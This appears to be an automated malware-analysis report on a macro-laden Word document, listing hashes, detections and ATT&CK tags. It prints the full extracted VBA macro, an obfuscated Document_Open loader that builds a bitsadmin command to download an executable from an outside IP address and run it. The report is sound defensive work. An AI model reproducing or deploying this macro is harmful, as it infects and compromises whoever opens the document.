Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 cd391b8ecc5845cd…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 176.8 KB
Created: 2017-03-08 23:05:00 UTC
Authoring application: Microsoft Office Word 12.0000
First seen: 2017-03-27
MD5: 8bd3679a6159184b80d8c1ee5b0eb144
SHA-1: 741f063b194e8570a9746259724c17a9f27c4ec3
SHA-256: cd391b8ecc5845cd22775be9b763d87342c3d7156ded9eab3bac696511ceed21
Risk score: 270

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Visual Basic

The sample is an OOXML document containing obfuscated VBA macros. Heuristics indicate the presence of an auto-exec loader that uses CreateObject and Shell functions, suggesting it attempts to download and execute a second-stage payload. The VBA script attempts to construct the string 'cmd.exe /c rundll32.exe' which is then likely used to execute a malicious payload.

Heuristics (6)

  • ClamAV: Doc.Macro.ObfuscatedChr-6203136-0 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Macro.ObfuscatedChr-6203136-0
  • VBA project inside OOXML (severity: medium, rule: OOXML_VBA, 3 related findings)
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA (severity: critical, rule: OLE_VBA_SHELL)
    Potential Shell call in VBA
    Matched line in script:
      Shell Ahakoq, vbNormalFocus
      End Sub
  • Obfuscated auto-exec VBA loader (severity: critical, rule: OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script:
      Sub Akvil()
        Application.Run "Esev"
      End Sub
  • Document_Open macro (severity: low, rule: OLE_VBA_DOCOPEN)
    Document_Open macro
    Matched line in script:
      Sub Document_Open()
        Call Akvil
  • Embedded URL (severity: info, rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs found in document text (OOXML body / shared strings):
      • http://schemas.openxmlformats.org/markup-compatibility/2006
      • http://schemas.openxmlformats.org/officeDocument/2006/relationships
      • http://schemas.openxmlformats.org/officeDocument/2006/math
      • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
      • http://schemas.openxmlformats.org/wordprocessingml/2006/main
      • http://schemas.microsoft.com/office/word/2006/wordml

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 4671 bytes
SHA-256: 63d308724edea04a35fda37cacabf421a3b9ddac54a67d2971fb758348db57ef

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Akvil()
  Application.Run "Esev"
End Sub

Function Efen()
 Dim Ahakoq As String
 Efen = Inak(99) & Inak(109) & Inak(100) & Inak(46) & Inak(101) & Inak(120) & Inak(101) & Inak(32) & Inak(47) & Inak(99)
End Function

Function Aduwq()
Dim Ahakoq As String
 Aduwq = Inak(32) & Inak(34) & Inak(119) & Inak(97) & Inak(105) & Inak(116) & Inak(102) & Inak(111) & Inak(114) & Inak(32)
End Function

Function Yhjac()
Dim Ahakoq As String
 Yhjac = Inak(47) & Inak(116) & Inak(32) & Inak(49) & Inak(50) & Inak(32) & Inak(85) & Inak(108) & Inak(117)
End Function

Function Yhaw()
 Dim Ahakoq As String
 Yhaw = Inak(98) & Inak(121) & Inak(32) & Inak(38) & Inak(32) & Inak(98) & Inak(105) & Inak(116) & Inak(115)
End Function

Function Agulh()
Dim Ahakoq As String
 Agulh = Inak(97) & Inak(100) & Inak(109) & Inak(105) & Inak(110) & Inak(32) & Inak(47) & Inak(116) & Inak(114)
End Function

Function Ohuw()
 Dim Ahakoq As String
 Ohuw = Inak(97) & Inak(110) & Inak(115) & Inak(102) & Inak(101) & Inak(114) & Inak(32) & Inak(109) & Inak(121)
End Function


Function Uregkaxr()
Dim Ahakoq As String
 Uregkaxr = Inak(106) & Inak(111) & Inak(98) & Inak(32) & Inak(47) & Inak(100) & Inak(111) & Inak(119) & Inak(110)
End Function

Function Ylyvf()
 Dim Ahakoq As String
 Ylyvf = Inak(108) & Inak(111) & Inak(97) & Inak(100) & Inak(32) & Inak(47) & Inak(112) & Inak(114) & Inak(105)
End Function

Function Ypuhw()
 Dim Ahakoq As String
 Ypuhw = Inak(111) & Inak(114) & Inak(105) & Inak(116) & Inak(121) & Inak(32) & Inak(110) & Inak(111) & Inak(114)
End Function

Function Efen0()
Dim Ahakoq As String
 Efen0 = Inak(109) & Inak(97) & Inak(108) & Inak(32) & Inak(104) & Inak(116) & Inak(116) & Inak(112) & Inak(58)
End Function

Function Efen1()
Dim Ahakoq As String
 Efen1 = Inak(47) & Inak(47) & Inak(49) & Inak(56) & Inak(53) & Inak(46) & Inak(49) & Inak(48) & Inak(48)
End Function

Function Efen2()
 Dim Ahakoq As String
 Efen2 = Inak(46) & Inak(50) & Inak(50) & Inak(50) & Inak(46) & Inak(50) & Inak(57) & Inak(47) & Inak(97)
End Function

Function Efen3()
Dim Ahakoq As String
 Efen3 = Inak(112) & Inak(112) & Inak(100) & Inak(97) & Inak(116) & Inak(97) & Inak(47) & Inak(109) & Inak(111)
End Function

Function Efen4()
 Dim Ahakoq As String
 Efen4 = Inak(122) & Inak(105) & Inak(108) & Inak(108) & Inak(97) & Inak(47) & Inak(102) & Inak(105) & Inak(114)
End Function


Function Efen5()
Dim Ahakoq As String
 Efen5 = Inak(101) & Inak(102) & Inak(111) & Inak(120) & Inak(46) & Inak(101) & Inak(120) & Inak(101) & Inak(32)
End Function

Function Efen6()
 Dim Ahakoq As String
 Efen6 = Inak(37) & Inak(97) & Inak(112) & Inak(112) & Inak(100) & Inak(97) & Inak(116) & Inak(97) & Inak(37)
End Function

Function Efen7()
Dim Ahakoq As String
 Efen7 = Inak(92) & Inak(73) & Inak(104) & Inak(101) & Inak(99) & Inak(46) & Inak(101) & Inak(120) & Inak(101)
End Function

Function Efen8()
 Dim Ahakoq As String
 Efen8 = Inak(32) & Inak(38) & Inak(115) & Inak(116) & Inak(97) & Inak(114) & Inak(116) & Inak(32) & Inak(37)
End Function


Function Efen9()
Dim Ahakoq As String
 Efen9 = Inak(97) & Inak(112) & Inak(112) & Inak(100) & Inak(97) & Inak(116) & Inak(97) & Inak(37) & Inak(92)
End Function

Function Aduwq0()
 Dim Ahakoq As String
 Aduwq0 = Inak(73) & Inak(104) & Inak(101) & Inak(99) & Inak(46) & Inak(101) & Inak(120) & Inak(101) & Inak(34)
End Function

Function Inak(Ynymhuw As Integer)
  Inak = Chr(Ynymhuw)
End Function

Sub Esev()
 Dim Ahakoq As String
 Dim vbNormalFocus As Long
 vbNormalFocus = 0

 Ahakoq = Efen() & Aduwq() & Yhjac() & Yhaw() & Agulh() & Ohuw()
 Ahakoq = Ahakoq & Uregkaxr() & Ylyvf() & Ypuhw()
 Ahakoq = Ahakoq & Efen0() & Efen1()

 Ahakoq = Ahakoq & Efen2() & Efen3()
 Ahakoq = Ahakoq & Efen4() & Efen5()
 Ahakoq = Ahakoq & Efen6()
 Ahakoq = Ahakoq & Efen7()
 
 Ahakoq = Ahakoq & Efen8() & Efen9() & Aduwq0()
 
 Shell Ahakoq, vbNormalFocus
End Sub
 

Sub Document_Open()
  Call Akvil
End Sub


Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{6DB7DF7C-8716-4781-B0B6-C390D1E0A454}{9C0C5990-23F9-4DB0-9929-001760CD1147}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 20480 bytes
SHA-256: bbf71c0e2669283ab80f56dade6760b647bfc040d6f5e5412096bf90c0f35f4b
Detection:
  ClamAV: Doc.Macro.ObfuscatedChr-6203136-0
  Obfuscation or payload: unlikely